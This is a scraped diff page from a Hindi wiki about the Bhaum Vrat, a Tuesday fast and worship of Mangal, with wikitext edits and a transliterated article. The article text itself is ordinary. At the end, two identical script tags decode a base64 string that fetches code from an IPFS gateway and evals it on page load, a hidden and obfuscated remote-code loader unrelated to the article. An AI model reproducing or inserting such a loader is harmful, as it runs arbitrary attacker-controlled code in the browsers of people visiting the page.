Difference between revisions of "भौम व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (भौमव्रत का नाम बदलकर भौम व्रत कर दिया गया है)
m (Text replacement - "अर्थात " to "अर्थात् ")
 
(8 intermediate revisions by 4 users not shown)
Line 1: Line 1:
**[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[स्वाति नक्षत्र]] वाले [[मंगलवार]] को नक्त विधि से भोजन कर; सात बार ऐसा किया जाता है।  
 
*[[स्वाति नक्षत्र]] वाले [[मंगलवार]] को नक्त विधि से भोजन कर; सात बार ऐसा किया जाता है।  
 
*एक ताम्र पत्र में लाल वस्त्र से आवृत कर के [[मंगल देवता|मंगल]] की स्वर्ण प्रतिमा रखी जाती है।  
 
*एक ताम्र पत्र में लाल वस्त्र से आवृत कर के [[मंगल देवता|मंगल]] की स्वर्ण प्रतिमा रखी जाती है।  
 
*पुष्पों एवं नैवेद्य का अपर्ण तथा 'यद्यपि तुम कुजन्मा हो' तथापि विज्ञ लोग तुम्हें मंगल कहते हैं' नामक मंत्र के साथ किसी ब्राह्मण गृहस्थ को दान करना चाहिए।  
 
*पुष्पों एवं नैवेद्य का अपर्ण तथा 'यद्यपि तुम कुजन्मा हो' तथापि विज्ञ लोग तुम्हें मंगल कहते हैं' नामक मंत्र के साथ किसी ब्राह्मण गृहस्थ को दान करना चाहिए।  
*'कुजन्मा' में श्लेष अर्थात इसके भिन्न अर्थ हैः  
+
*'कुजन्मा' में श्लेष अर्थात् इसके भिन्न अर्थ हैः  
 
#किसी अशुभ दिन में उत्पन्न   
 
#किसी अशुभ दिन में उत्पन्न   
 
#पृथ्वी से उत्पन्न।  
 
#पृथ्वी से उत्पन्न।  
*मंगल का रंग लाल है, अतः ताम्र, लाल एवं कुंकुम का प्रयोग होता है; <ref>हेमाद्रि (व्रत0 2, 567, भविष्योत्तरपुराण से उद्धरण)</ref>;
+
*मंगल का रंग लाल है, अतः ताम्र, लाल एवं कुंकुम का प्रयोग होता है।<ref>हेमाद्रि (व्रत0 2, 567, भविष्योत्तरपुराण से उद्धरण</ref>
 
*[[मंगलवार]] को मंगल पूजा करनी चाहिए।  
 
*[[मंगलवार]] को मंगल पूजा करनी चाहिए।  
 
*प्रातःकाल मंगल के नामों का जाप (कुल 21 नाम हैं, यथा–मंगल, कुज, लोहित, यम, सामवेदियो के प्रेमी); एक त्रिभुजाकार चित्र, बीच में छेद; कुंकुम एवं लाल चन्दन से प्रत्येक कोण पर तीन नाम (आर, वक्र एवं कुंज) लिखे जाते हैं।  
 
*प्रातःकाल मंगल के नामों का जाप (कुल 21 नाम हैं, यथा–मंगल, कुज, लोहित, यम, सामवेदियो के प्रेमी); एक त्रिभुजाकार चित्र, बीच में छेद; कुंकुम एवं लाल चन्दन से प्रत्येक कोण पर तीन नाम (आर, वक्र एवं कुंज) लिखे जाते हैं।  
**ऐसी मान्यता है कि मंगल का जन्म [[उज्जयिनी]] में [[भारद्वाज]] कुल में हुआ था और वह मेढ़ा (मेष) की सवारी करता है।  
+
*ऐसी मान्यता है कि मंगल का जन्म [[उज्जयिनी]] में [[भारद्वाज]] कुल में हुआ था और वह मेढ़ा (मेष) की सवारी करता है।  
*यदि कोई जीवन भर इस व्रत का करे तो वह समृद्धिशाली, पुत्र पौत्रवान हो जाता है और गहों के लोक में पहुँच जाता है; <ref>हेमाद्रि (व्रत0 2, 568-574, पद्मपुराण से उद्धरण)</ref>, <ref>वर्षकृत्यदीपक (443-451) में भौमव्रत तथा व्रतपूजा का विस्तृत उल्लेख है</ref>
+
*यदि कोई जीवन भर इस व्रत का करे तो वह समृद्धिशाली, पुत्र पौत्रवान हो जाता है और गहों के लोक में पहुँच जाता है।<ref>हेमाद्रि (व्रतखण्ड 2, 568-574, [[पद्म पुराण]] से उद्धरण</ref>, <ref>वर्षकृत्यदीपक (443-451) में भौमव्रत तथा व्रतपूजा का विस्तृत उल्लेख है</ref>  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 07:57, 7 November 2017

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • svati nakshatr vale mangalavar ko nakt vidhi se bhojan kar; sat bar aisa kiya jata hai.
  • ek tamr patr mean lal vastr se avrit kar ke mangal ki svarn pratima rakhi jati hai.
  • pushpoan evan naivedy ka aparn tatha 'yadyapi tum kujanma ho' tathapi vijn log tumhean mangal kahate haian' namak mantr ke sath kisi brahman grihasth ko dan karana chahie.
  • 'kujanma' mean shlesh arthath isake bhinn arth haiah
  1. kisi ashubh din mean utpann
  2. prithvi se utpann.
  • mangal ka rang lal hai, atah tamr, lal evan kuankum ka prayog hota hai.[1]
  • mangalavar ko mangal pooja karani chahie.
  • pratahkal mangal ke namoan ka jap (kul 21 nam haian, yatha–mangal, kuj, lohit, yam, samavediyo ke premi); ek tribhujakar chitr, bich mean chhed; kuankum evan lal chandan se pratyek kon par tin nam (ar, vakr evan kuanj) likhe jate haian.
  • aisi manyata hai ki mangal ka janm ujjayini mean bharadvaj kul mean hua tha aur vah medha (mesh) ki savari karata hai.
  • yadi koee jivan bhar is vrat ka kare to vah samriddhishali, putr pautravan ho jata hai aur gahoan ke lok mean pahuanch jata hai.[2], [3]


tika tippani aur sandarbh

  1. hemadri (vrat0 2, 567, bhavishyottarapuran se uddharan
  2. hemadri (vratakhand 2, 568-574, padm puran se uddharan
  3. varshakrityadipak (443-451) mean bhaumavrat tatha vratapooja ka vistrit ullekh hai

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>